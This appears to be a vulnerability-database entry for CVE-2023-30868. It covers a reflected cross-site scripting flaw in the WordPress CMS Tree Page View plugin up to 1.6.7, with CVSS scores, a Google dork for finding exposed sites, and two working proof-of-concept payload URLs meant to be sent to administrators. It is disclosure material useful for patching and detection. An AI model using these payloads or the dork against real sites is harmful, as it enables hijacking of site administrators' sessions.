Lucene search
LEE SE HYOUNG1337DAY-ID-38765HistoryJun 06, 2023 - 12:00 a.m.
Tree Page View Plugin 1.6.7 - Cross Site Scripting Vulnerability
2023-06-0600:00:00
LEE SE HYOUNG
0day.today
174
wordpress
cross site scripting
plugin vulnerability
administrator privileges
reflected xss
web application
cve-2023-30868
patchstack
CVSS3
7.1
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
LOW
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
EPSS
0.001
Percentile
49.6%
# Exploit Title: Tree Page View Plugin 1.6.7 - Cross Site Scripting (XSS)
# Google Dork: inurl:/wp-content/plugins/cms-tree-page-view/
# Exploit Author: LEE SE HYOUNG (hackintoanetwork)
# Vendor Homepage: https://wordpress.org/plugins/cms-tree-page-view/
# Software Link: https://downloads.wordpress.org/plugin/cms-tree-page-view.1.6.6.zip
# Category: Web Application
# Version: 1.6.7
# Tested on: Debian / WordPress 6.1.1
# CVE : CVE-2023-30868
# Reference: https://patchstack.com/database/vulnerability/cms-tree-page-view/wordpress-cms-tree-page-view-plugin-1-6-7-cross-site-scripting-xss-vulnerability?_s_id=cve
# 1. Technical Description:
The CMS Tree Page View plugin for WordPress has a Reflected Cross-Site Scripting vulnerability up to version 1.6.7.
This is due to the post_type parameter not properly escaping user input. As a result, users with administrator privileges or higher can inject JavaScript code that will execute whenever accessed.
# 2. Proof of Concept (PoC):
WordPress CMS Tree Page View Plugin <= 1.6.7 Cross-Site Scripting (XSS)
In the case of this vulnerability, there are two XSS PoCs available: one for version 1.6.6 and another for version 1.6.7.
1. CMS Tree Page View Plugin <= 1.6.6
a. Send the following URL to users with administrator privileges or higher: http://localhost:8888/wp-admin/edit.php?page=cms-tpv-page-post&post_type=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E.
b. your payload will be executed.
[!] note : To make the payload work, the "In menu" option under Settings -> CMS Tree Page View -> Select where to show a tree for pages and custom post types needs to be enabled for posts.
2. CMS Tree Page View Plugin <= 1.6.7
a. Send the following URL to users with administrator privileges or higher: http://localhost:8888/wp-admin/edit.php?page=cms-tpv-page-post&post_type=%22+accesskey%3DC+onclick%3Djavascript%3Aalert%281%29%3B+a%3D%22.
b. Your payload will execute the script when the user presses Ctrl + Alt + c (Mac) or Alt + Shift + c (Windows).
[!] note : To make the payload work, the "In menu" option under Settings -> CMS Tree Page View -> Select where to show a tree for pages and custom post types needs to be enabled for posts.
Related
openvas
openvas
WordPress CMS Tree Page View Plugin < 1.6.8 XSS Vulnerability
2023-09-12 00:00:00
cvelist
cvelist
wpvulndb
wpvulndb
CMS Tree Page View < 1.6.8 - Reflected XSS
2023-04-20 00:00:00
nvd
nvd
CVE-2023-30868
2023-05-18 09:15:10
exploitdb
exploitdb
Tree Page View Plugin 1.6.7 - Cross Site Scripting (XSS)
2023-06-06 00:00:00
nuclei
nuclei
Tree Page View Plugin < 1.6.7 - Cross-Site Scripting
2023-10-17 07:20:28
prion
prion
Cross site scripting
2023-05-18 09:15:00
cve
cve
CVE-2023-30868
2023-05-18 09:15:10
packetstorm
packetstorm
WordPress Tree Page View 1.6.7 Cross Site Scripting
2023-06-06 00:00:00
wordfence
wordfence
CVSS3
7.1
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
LOW
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
EPSS
0.001
Percentile
49.6%
Related for 1337DAY-ID-38765